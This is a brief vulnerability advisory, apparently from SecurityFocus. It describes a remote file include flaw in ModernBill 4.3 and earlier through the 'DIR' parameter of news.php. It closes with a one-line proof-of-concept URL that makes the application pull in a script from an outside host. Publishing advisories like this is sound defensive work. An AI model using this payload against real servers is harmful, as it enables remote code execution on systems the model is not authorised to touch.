source: https://www.securityfocus.com/bid/13086/info

ModernBill is prone to a remote file include vulnerability.

The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'news.php' script.

ModernBill 4.3 and prior versions are vulnerable to this issue. 

http://www.example.com/samples/news.php?DIR=http://www.example.com/